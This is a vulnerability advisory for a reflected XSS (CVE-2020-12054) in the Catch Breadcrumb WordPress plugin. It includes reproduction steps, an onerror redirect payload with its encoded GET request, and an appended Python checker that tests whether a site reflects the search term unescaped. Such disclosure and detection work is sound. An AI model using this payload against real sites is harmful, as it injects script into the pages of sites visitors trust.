Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS



Description
=== [ DESCRIPTION - REFLECTED XSS ] ========================================
# The Catch Breadcrumb plugin for WordPress (tested on 1.5.4; every release before 1.5.7 is affected) allows reflected XSS via the search query (the s parameter) when it is used with one of the themes from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO. The search term is reflected into the page without being escaped, so the markup in it is rendered and executed by the visitor's browser; no authentication is required.


=== [ AFFECTED CATCH THEMES ] ==============================================
# 00 - ALCHEMIST & ALCHEMIST PRO [ https://catchthemes.com/demo/alchemist/ ]
# 01 - IZABEL & IZABEL PRO [ https://catchthemes.com/demo/izabel/ ]
# 02 - CHIQUE & CHIQUE PRO [ https://catchthemes.com/demo/chique/ ]
# 03 - CLEAN ENTERPRISE & CLEAN ENTERPRISE PRO [ https://catchthemes.com/demo/clean-enterprise/ ]
# 04 - BOLD PHOTOGRAPHY PRO [ https://catchthemes.com/demo/bold-photography/ ]
# 05 - INTUITIVE PRO [ https://catchthemes.com/demo/intuitive/ ]
# 06 - DEVOTEPRESS PRO [ https://catchthemes.com/demo/devotepress/ ]
# 07 - CLEAN BLOCKS PRO [ https://catchthemes.com/demo/clean-blocks/ ]
# 08 - FOODOHOLIC PRO [ https://catchthemes.com/demo/foodoholic/ ]
# 09 - CATCH MAG PRO [ https://catchthemes.com/demo/catch-mag/ ]
# 10 - CATCH WEDDING PRO [ https://catchthemes.com/themes/catch-wedding-pro/ ]
# 11 - HIGHER EDUCATION PRO [ https://catchthemes.com/themes/higher-education-pro/ ]

Edit (WPScanTeam):
April 22nd, 2020 - Escalated to WP Plugins Team. Plugin Closed
April 23rd to 25th, 2020 - Various versions released, to add validation and sanitisation
Proof of Concept
=== [ STEPS TO REPRODUCE ] =================================================
# 00 - Install and activate any of the affected themes;
# 01 - Download the Catch Breadcrumb plugin from https://downloads.wordpress.org/plugin/catch-breadcrumb.zip or install it directly from the WordPress admin dashboard (to reproduce, use a release before 1.5.7, since 1.5.7 contains the fix);
# 02 - Activate the plugin;
# 03 - Browse to the site's front end;
# 04 - Put an XSS payload in the search query, e.g.: /?s=<img src=x onerror=window.location=`https://profiles.wordpress.org/exmi/`;>


=== [ PROOF-OF-CONCEPT ] ===================================================
GET /?s=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fprofiles.wordpress.org%2Fexmi%2F%60%3B%3E HTTP/1.1
Host: target.com


Note: If the payload does not fire (this can happen when the plugin was installed before the theme, for example), go to the plugin settings (/wp-admin/admin.php?page=catch-breadcrumb) and click the 'Save Changes' button, then repeat the request.
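A check for this issue, as an added example that is not part of the advisory or of the plugin's code: it builds the PoC request above from the advisory's payload and classifies a response body as reflecting the search term unescaped (vulnerable), HTML-escaped (what a sanitised release would return) or not at all. The sample response bodies are constructed, not captured from a real site, and assume the breadcrumb trail prints the search term; check_site() is the only part that touches the network, and target.com is a placeholder host.

```python
"""Checker for the Catch Breadcrumb reflected XSS (CVE-2020-12054).

Added example, not code from the advisory or the plugin. It builds the PoC
request and classifies a response body as reflecting the search term
unescaped (vulnerable), HTML-escaped (sanitised) or not at all.
"""
import html
import urllib.request
from urllib.parse import urlencode

# Payload from the advisory's step 04 (the URL-decoded form of the PoC GET line).
PAYLOAD = "<img src=x onerror=window.location=`https://profiles.wordpress.org/exmi/`;>"


def build_poc_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Return the front-end search URL carrying the payload in the s parameter.

    urlencode() percent-encodes the payload exactly as the advisory's GET line
    does: spaces become '+', everything else outside the unreserved set becomes
    a %XX escape.
    """
    return base_url.rstrip("/") + "/?" + urlencode({"s": payload})


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Say how the search term came back in body.

    'unescaped' - the payload is present verbatim, so the <img> tag is live markup
    'escaped'   - only an entity-encoded copy is present (what esc_html() emits)
    'absent'    - the term was not reflected, or was stripped entirely
    """
    if payload in body:
        return "unescaped"
    escaped_forms = {
        html.escape(payload, quote=True),
        html.escape(payload, quote=False),
        # WordPress esc_html() encodes a single quote as &#039;, not &#x27;.
        html.escape(payload, quote=True).replace("&#x27;", "&#039;"),
    }
    if any(form in body for form in escaped_forms):
        return "escaped"
    return "absent"


def check_site(base_url: str, timeout: float = 10.0) -> str:
    """Fetch the PoC URL from a live site and classify the reflection (needs network)."""
    req = urllib.request.Request(
        build_poc_url(base_url), headers={"User-Agent": "cve-2020-12054-check"}
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body)


# Constructed sample responses (not captured from a real site). They assume the
# breadcrumb trail prints the search term, either raw or escaped.
VULNERABLE_BODY = (
    '<nav class="breadcrumb"><a href="https://target.com/">Home</a> &raquo; '
    "Search Results for: " + PAYLOAD + "</nav>"
)
FIXED_BODY = (
    '<nav class="breadcrumb"><a href="https://target.com/">Home</a> &raquo; '
    "Search Results for: " + html.escape(PAYLOAD) + "</nav>"
)
NO_ECHO_BODY = (
    '<nav class="breadcrumb"><a href="https://target.com/">Home</a> &raquo; '
    "Search Results</nav>"
)


if __name__ == "__main__":
    print(build_poc_url("https://target.com"))
    for label, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY), ("no echo", NO_ECHO_BODY)):
        print(f"{label:>10}: {classify_reflection(body)}")
```

Against a live install, check_site("https://target.com") returns "unescaped" when the breadcrumb still prints the raw term; "escaped" is the expected result after updating to 1.5.7, and "absent" usually means the breadcrumb is not rendered on search pages at all (see the note above about re-saving the plugin settings).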

Affects Plugin

Catch Breadcrumb, fixed in version 1.5.7

References

CVE 2020-12054
URL https://catchplugins.com/
URL https://catchthemes.com/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher ΞX.MI
Submitter ΞX.MI
Submitter Website https://ex-mi.ru/
Verified Yes
WPVDB ID 10184

Timeline

Publicly Published 2020-04-22
Added 2020-04-22
Last Updated 2020-04-30
